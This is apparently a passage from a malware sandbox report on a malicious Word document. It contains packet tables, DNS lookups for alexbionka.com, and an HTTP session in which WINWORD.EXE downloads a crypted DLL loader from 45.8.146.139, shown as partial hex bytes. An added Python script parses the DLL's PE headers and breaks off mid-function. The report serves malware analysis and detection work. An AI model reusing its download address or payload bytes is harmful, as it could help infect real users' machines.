                                                Aug 11, 2022 17:27:53.785945892 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.785963058 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786026955 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786043882 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786058903 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786061049 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786077023 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786093950 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786108971 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786111116 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786128044 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786130905 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786145926 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786153078 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786161900 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786171913 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786180019 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786190987 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786207914 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786218882 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786236048 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786240101 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786254883 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786257029 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786273003 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786278009 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786290884 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786293030 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786308050 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786310911 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786324978 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786329031 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786340952 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786349058 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786358118 CEST804917145.8.146.139192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 11, 2022 17:27:53.786366940 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.786375046 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.786384106 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.786391020 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.786401987 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.786407948 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.786420107 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.786425114 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.786437035 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.786442995 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.786454916 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.786458969 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.786470890 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.786474943 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.786488056 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.786492109 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.786508083 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.786508083 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.786525011 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.786526918 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.786541939 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.786545992 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.786559105 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.786562920 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.786576033 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.786581039 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.786601067 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.786619902 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.787009954 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.888993025 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889025927 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889043093 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889054060 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889070988 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889086962 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889101982 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889118910 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889136076 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889153004 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889168978 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889184952 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889200926 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889245033 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889261007 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889276981 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889295101 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889311075 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889321089 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.889328957 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889345884 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889354944 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.889362097 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889379025 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889395952 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889411926 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889448881 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889455080 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.889467001 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889482021 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889498949 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889516115 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889517069 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.889533043 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889549017 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889565945 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889581919 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889610052 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889626980 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889636993 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.889642000 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889658928 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889676094 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889693022 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889708042 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889725924 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889751911 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.889754057 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889761925 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889766932 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889780998 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889796972 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889811993 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889828920 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889844894 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889859915 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889872074 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889888048 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889903069 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889919996 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889935970 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889951944 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:53.889966011 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.890166998 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:53.891139030 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:27:58.583367109 CEST | 80 | 49171 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:27:58.583476067 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:28:04.849479914 CEST | 49172 | 80 | 192.168.2.22 | 64.227.108.27
Aug 11, 2022 17:28:05.023319960 CEST | 80 | 49172 | 64.227.108.27 | 192.168.2.22
Aug 11, 2022 17:28:05.023489952 CEST | 49172 | 80 | 192.168.2.22 | 64.227.108.27
Aug 11, 2022 17:28:05.028685093 CEST | 49172 | 80 | 192.168.2.22 | 64.227.108.27
Aug 11, 2022 17:28:05.202203989 CEST | 80 | 49172 | 64.227.108.27 | 192.168.2.22
Aug 11, 2022 17:28:05.683288097 CEST | 80 | 49172 | 64.227.108.27 | 192.168.2.22
Aug 11, 2022 17:28:05.878340960 CEST | 49172 | 80 | 192.168.2.22 | 64.227.108.27
Aug 11, 2022 17:28:06.655955076 CEST | 49172 | 80 | 192.168.2.22 | 64.227.108.27
Aug 11, 2022 17:29:13.851617098 CEST | 49171 | 80 | 192.168.2.22 | 45.8.146.139
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 11, 2022 17:28:04.715267897 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
Aug 11, 2022 17:28:04.732486010 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
Aug 11, 2022 17:28:04.747967958 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
Aug 11, 2022 17:28:04.775587082 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 11, 2022 17:28:04.715267897 CEST | 192.168.2.22 | 8.8.8.8 | 0xd61c | Standard query (0) | alexbionka.com | A (IP address) | IN (0x0001)
Aug 11, 2022 17:28:04.747967958 CEST | 192.168.2.22 | 8.8.8.8 | 0x6557 | Standard query (0) | alexbionka.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 11, 2022 17:28:04.732486010 CEST | 8.8.8.8 | 192.168.2.22 | 0xd61c | No error (0) | alexbionka.com |  | 64.227.108.27 | A (IP address) | IN (0x0001)
Aug 11, 2022 17:28:04.775587082 CEST | 8.8.8.8 | 192.168.2.22 | 0x6557 | No error (0) | alexbionka.com |  | 64.227.108.27 | A (IP address) | IN (0x0001)
                                                • 45.8.146.139
                                                • alexbionka.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49171 | 45.8.146.139 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
Aug 11, 2022 17:27:53.142085075 CEST | 0 | OUT | GET /fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm HTTP/1.1
                                                Accept: */*
                                                UA-CPU: AMD64
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: 45.8.146.139
                                                Connection: Keep-Alive
Aug 11, 2022 17:27:53.262594938 CEST | 2 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 11 Aug 2022 15:27:53 GMT
                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                X-Powered-By: PHP/7.2.34
                                                Content-Description: File Transfer
                                                Content-Disposition: attachment; filename="loader_p3_dll_64_n3_crypt_x64_asm_clone_n152.dll"
                                                Expires: 0
                                                Cache-Control: must-revalidate
                                                Pragma: public
                                                Content-Length: 360448
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 55 ef 34 c3 11 8e 5a 90 11 8e 5a 90 11 8e 5a 90 02 e9 59 91 10 8e 5a 90 59 e0 5a 91 10 8e 5a 90 33 e6 a5 90 10 8e 5a 90 6a e1 58 91 10 8e 5a 90 52 69 63 68 11 8e 5a 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 59 d1 f4 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 12 0e 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 07 00 0c 00 06 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 91 9d 05 00 03 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 05 00 7d 01 00 00 00 00 00 00 00 00 00 00 00 a0 05 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 77 05 00 00 10 00 00 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7d 01 00 00 00 90 05 00 00 02 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 05 00 00 02 00 00 00 7e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U4ZZZYZYZZ3ZjXZRichZPEdYb" x`}.textwx `.rdata}|@@.rsrc~@@
Aug 11, 2022 17:27:53.262634039 CEST | 3 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: H_IIHLD$T$:tHL$Hf;tD$($:tHIHsvIHD$
Aug 11, 2022 17:27:53.262659073 CEST | 4 | IN | Data Raw: 98 00 00 00 ae 00 00 00 c7 84 24 9c 00 00 00 05 00 00 00 e9 60 ff ff ff 81 84 24 84 00 00 00 a2 00 00 00 c7 84 24 88 00 00 00 0c 00 00 00 3a ff 74 00 83 84 24 88 00 00 00 21 c7 84 24 8c 00 00 00 00 00 00 00 66 3b ff 74 00 83 84 24 8c 00 00 00 4c
Data Ascii: $`$$:t$!$f;t$L$f:t$$$$f;tD$hD$lf;D$`D$d:t5D$TD$X?f;tD$XD$\f;t#D$PTD$T:tD$d
Aug 11, 2022 17:27:53.262682915 CEST | 6 | IN | Data Raw: 00 00 00 83 c0 32 3a e4 74 d8 b8 34 00 00 00 83 c0 36 e9 37 03 00 00 b8 57 00 00 00 83 c0 0f 66 3b c9 74 0a 83 c0 44 66 89 44 24 60 eb dc 66 89 44 24 5e b8 29 00 00 00 3a f6 74 e8 b8 34 00 00 00 83 c0 37 66 3b e4 0f 84 7b ff ff ff 48 83 bc 24 a0
Data Ascii: 2:t467Wf;tDfD$`fD$^):t47f;{H$t$u3H$_^:L$HT$pf;tH$$9L$pH$h:tH$`T$x$@m$D:t1$L
Aug 11, 2022 17:27:53.262706995 CEST | 7 | IN | Data Raw: 00 00 e9 6c fc ff ff 83 84 24 14 01 00 00 0a c7 84 24 18 01 00 00 25 00 00 00 66 3b ed 0f 84 74 ff ff ff 33 c0 48 81 c4 48 02 00 00 e9 11 fb ff ff 8b 44 24 30 ff c0 e9 96 02 00 00 33 c0 eb e5 48 c7 84 24 98 00 00 00 00 00 00 00 e9 80 00 00 00 48
Data Ascii: l$$%f;t3HHD$03H$H$t$uAXA\HAAHHHIV!IH3H|$xu!H$H$uf;t3aD$xHD$pR$
Aug 11, 2022 17:27:53.262732029 CEST | 8 | IN | Data Raw: 00 00 00 66 3b ff 74 00 c7 84 24 d8 00 00 00 16 00 00 00 83 84 24 d8 00 00 00 40 eb b8 c7 84 24 c4 00 00 00 c0 00 00 00 81 84 24 c4 00 00 00 85 00 00 00 3a f6 74 17 c7 84 24 c0 00 00 00 32 03 00 00 83 84 24 c0 00 00 00 03 3a e4 74 cf c7 84 24 c8
Data Ascii: f;t$$@$$:t$2$:t$.$f;t$$:f;t/$%$f;t$A$:t$$:Af;t-H$P:tD
Aug 11, 2022 17:27:53.262754917 CEST | 10 | IN | Data Raw: 00 81 84 24 ec 00 00 00 de 00 00 00 3a ff 74 79 c7 84 24 e0 00 00 00 90 02 00 00 83 84 24 e0 00 00 00 6d 3a ed 74 4a c7 84 24 f8 00 00 00 52 00 00 00 83 84 24 f8 00 00 00 04 3a c0 74 17 c7 84 24 f4 00 00 00 02 00 00 00 83 84 24 f4 00 00 00 16 3a
Data Ascii: $:ty$$m:tJ$R$:t$$:t$$of;X$$f;t$P$f;t$($f;9D$@0D$@:tYD$`D$`T$D$HD$Ho:tD
Aug 11, 2022 17:27:53.262779951 CEST | 11 | IN | Data Raw: 24 d8 00 00 00 ae 00 00 00 c7 84 24 dc 00 00 00 05 00 00 00 eb 97 83 84 24 c8 00 00 00 21 c7 84 24 cc 00 00 00 00 00 00 00 3a c9 74 00 83 84 24 cc 00 00 00 4c c7 84 24 d0 00 00 00 66 00 00 00 66 3b c9 0f 84 48 ff ff ff 81 84 24 d4 00 00 00 b3 00
Data Ascii: $$$!$:t$L$ff;H$$:t$$f;d$z$\f;t3HL$8f;tT$hHL$@:t$HL$8T$`:tD$0AHD$@HD$ >u3
Aug 11, 2022 17:27:53.262804031 CEST | 12 | IN | Data Raw: c7 84 24 fc 00 00 00 12 00 00 00 3a c0 74 cf 81 84 24 04 01 00 00 8b 00 00 00 c7 84 24 08 01 00 00 16 00 00 00 e9 52 ff ff ff 83 84 24 e0 00 00 00 2d c7 84 24 e4 00 00 00 41 00 00 00 66 3b c0 0f 84 4e ff ff ff 83 84 24 f0 00 00 00 03 c7 84 24 f4
Data Ascii: $:t$$R$-$Af;N$$:K$$:tH&I%HXIIcIIIL#HIH$P$Tf;t$T$X$<
Aug 11, 2022 17:27:53.262897015 CEST | 14 | IN | Data Raw: 58 88 44 24 20 48 8b 44 24 30 66 3b d2 74 3d 41 83 c0 0f 33 d2 3a d2 74 d7 48 8b c1 8a 00 66 3b db 74 de 48 8b 8c 24 88 00 00 00 4c 8b 01 e9 34 fe ff ff 8a 4c 24 21 e8 d6 01 00 00 e9 8a 01 00 00 48 8b c1 8a 40 01 66 3b ff 74 97 48 8b 4c 24 38 48
Data Ascii: XD$ HD$0f;t=A3:tHf;tH$L4L$!H@f;tHL$8Hf;tkH@`uH|$(rAHD$(HwHxHD$0HD$(IHIHdHD$0HLHI"I_IHfI\IM3M_HAUHA]
Aug 11, 2022 17:27:53.366070986 CEST | 15 | IN | Data Raw: f7 d4 8b 44 24 04 89 44 24 08 eb 35 c3 41 50 41 ff d6 49 81 c3 07 06 00 00 48 25 54 03 00 00 4d 0f a4 f5 59 48 81 e5 a4 11 00 00 49 f7 fb 49 ff c1 53 4c 87 d9 e4 9a c3 49 13 e3 48 f7 f4 4c 03 c1 8b 44 24 08 48 83 c4 18 e9 67 ff ff ff 8b 04 24 89
Data Ascii: D$D$5APAIH%TMYHIISLIHLD$Hg$D$Hm"H3HHPHHHIHI6!IIHHM#9D$49D$,}:D$$D$8xgHPHMiIIIMAII
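The 200 OK in this session hands WINWORD.EXE a 360448-byte body that begins with an MZ header and is labelled loader_p3_dll_64_n3_crypt_x64_asm_clone_n152.dll by its Content-Disposition. The Python below is an added example, not code from this report or from Joe Sandbox. It parses the first 0x250 bytes of that body, transcribed from the Data Raw dump above (the all-zero runs are written as bytes(n) rather than copied byte for byte), and cross-checks the headers against facts seen elsewhere in the report: the machine type and DLL flag, the 0x180000000 image base that the Yara hits on Target ID 5 reference (memory dump addresses 0x180001000 and 0x180004000), the section table, and whether the section layout accounts for exactly the advertised Content-Length.

```python
import struct
from datetime import datetime, timezone

# First 0x250 bytes of the response body, transcribed from the "Data Raw" dump
# above (DOS header, DOS stub, Rich header, PE/COFF header, PE32+ optional
# header, three section headers). Runs of zero bytes are written as bytes(n)
# rather than copied byte by byte; everything else is verbatim from the dump.
SAMPLE_HEADER = b"".join([
    bytes.fromhex("4d5a90000300000004000000ffff0000"      # IMAGE_DOS_HEADER
                  "b8000000000000004000000000000000"),
    bytes(28), bytes.fromhex("d0000000"),                  # e_lfanew = 0xd0
    bytes.fromhex("0e1fba0e00b409cd21b8014ccd215468"      # DOS stub
                  "69732070726f6772616d2063616e6e6f"
                  "742062652072756e20696e20444f5320"
                  "6d6f64652e0d0d0a2400000000000000"),
    bytes.fromhex("55ef34c3118e5a90118e5a90118e5a90"      # Rich header
                  "02e95991108e5a9059e05a91108e5a90"
                  "33e6a590108e5a906ae15891108e5a90"
                  "52696368118e5a90"), bytes(24),
    bytes.fromhex("50450000" "64860300" "59d1f462"         # "PE\0\0", COFF header
                  "0000000000000000" "f0002220"),
    bytes.fromhex("0b02120e" "00780500" "00040000" "00000000" "00100000" "00100000"
                  "0000008001000000" "00100000" "00020000"  # PE32+ optional header
                  "0600000007000c0006000000" "00000000"
                  "00b00500" "00040000" "919d0500" "03006001"
                  "0000100000000000" "0010000000000000"
                  "0000100000000000" "0010000000000000"
                  "00000000" "10000000"
                  "009005007d010000" "0000000000000000" "00a00500e0010000"),
    bytes(104),                                            # 13 unused data directories
    bytes.fromhex("2e74657874000000" "14770500" "00100000" "00780500" "00040000"),
    bytes(12), bytes.fromhex("20000060"),                  # .text
    bytes.fromhex("2e72646174610000" "7d010000" "00900500" "00020000" "007c0500"),
    bytes(12), bytes.fromhex("40000040"),                  # .rdata
    bytes.fromhex("2e72737263000000" "e0010000" "00a00500" "00020000" "007e0500"),
    bytes(12), bytes.fromhex("40000040"),                  # .rsrc
])

IMAGE_FILE_DLL = 0x2000
IMAGE_FILE_MACHINE_AMD64 = 0x8664
DLL_DYNAMIC_BASE, DLL_NX_COMPAT = 0x0040, 0x0100


def parse_pe32plus(data: bytes) -> dict:
    """Parse the DOS, COFF, PE32+ optional and section headers of a 64-bit image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature at e_lfanew=%#x" % e_lfanew)
    coff = e_lfanew + 4
    machine, nsect, tstamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x20B:
        raise ValueError("not a PE32+ optional header")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]
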